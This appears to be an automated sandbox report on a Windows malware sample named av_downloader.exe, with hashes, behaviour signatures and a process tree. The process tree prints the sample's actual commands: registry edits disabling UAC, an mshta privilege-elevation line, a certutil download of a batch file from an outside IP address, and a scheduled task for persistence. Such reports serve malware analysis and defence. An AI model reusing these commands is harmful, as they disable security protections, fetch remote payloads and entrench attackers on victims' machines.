Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    20/04/2024, 11:56

General

  • Target

    av_downloader.exe

  • Size

    90KB

  • MD5

    8af4f985862c71682e796dcc912f27dc

  • SHA1

    7f83117abfeff070d41d8144cf1dfe3af8607d27

  • SHA256

    d925204430ffab51ffbbb9dc90bc224b04f0c2196769850695512245a886be06

  • SHA512

    3d4fcd9755dc4ea005fcd46e78426c5f71b50873c5174a69abcdff41a2e0405c87a36137c0c2409abedadb0ecdf622cbfd2fa1b59a2e06c81cef68d7c6c663b7

  • SSDEEP

    1536:v7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfnweJbOC:D7DhdC6kzWypvaQ0FxyNTBfnBV

Score
10/10

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\av_downloader.exe
    "C:\Users\Admin\AppData\Local\Temp\av_downloader.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\19E7.tmp\19E8.tmp\19E9.bat C:\Users\Admin\AppData\Local\Temp\av_downloader.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1056
      • C:\Windows\system32\mshta.exe
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE
          "C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1AE0.tmp\1AE1.tmp\1AE2.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"
            5⤵
            • Enumerates connected drives
            • Suspicious use of WriteProcessMemory
            PID:2600
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2664
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2648
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2672
            • C:\Windows\SysWOW64\attrib.exe
              attrib +s +h e:\net
              6⤵
              • Sets file to hidden
              • Views/modifies file attributes
              PID:2556
            • C:\Windows\SysWOW64\certutil.exe
              certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat
              6⤵
                PID:2660
              • C:\Windows\SysWOW64\certutil.exe
                certutil -urlcache * delete
                6⤵
                  PID:2784
                • C:\Windows\SysWOW64\schtasks.exe
                  SchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f
                  6⤵
                  • Creates scheduled task(s)
                  PID:2800
                • C:\Windows\SysWOW64\timeout.exe
                  TIMEOUT /T 100
                  6⤵
                  • Delays execution with timeout.exe
                  PID:1656

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D91B1967EF3D6973EA9AE658EC3C1C5D

        Filesize

        1KB

        MD5

        ce802b6e8add0c59b4c1ceea614bafa3

        SHA1

        06bfafde5c85d2ea230ebccf8db6f0d9e39520a1

        SHA256

        419010826148482cca4ad662fdbdc8eac445b4b6181e4a1f4b62d7eb7783f4e2

        SHA512

        8acd430a20f444bd2fc45b059805cb608d19e95edd60576340dcbce99072e6e58be43fc0bd61c031698279c964f748ffebf01ef94a7c7e90f02b2b0f041fe6e8

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D91B1967EF3D6973EA9AE658EC3C1C5D

        Filesize

        248B

        MD5

        cfb7e784f71f38f832bf229dd089caa5

        SHA1

        0af0c4ed8ad6b7561e5088186d57133bb0b1d710

        SHA256

        fde43a8cbed55ed2accba41d7b9baca977e2912810e9f2773e66095e2310b9a0

        SHA512

        4fe41f8af32e0d9e60e25323ac849bc5ce25a6ffe0ae77e8cc8c6f2d1e7e9dc011cdc52c91db92948ff956334a48d14e4a1206c25de49e2d107b4147e0172823

      • C:\Users\Admin\AppData\Local\Temp\19E7.tmp\19E8.tmp\19E9.bat

        Filesize

        965B

        MD5

        db5421114f689cfb1c82edf49fddd7a4

        SHA1

        a1987cfe0b38bdac3fe75bae72137463a0843fac

        SHA256

        edb8e629e2c5ae4498d0f00cb4540f185cf6136ba11898a542d2fdd34394379a

        SHA512

        6eaf5f71787046951ffc1fe98c3fdae7dd5a36214cf4971146a94d200bbf2037a8f87e1afa81e05b2d34083d298b0254ac23d2b2e518b6e75fab38e5ca376281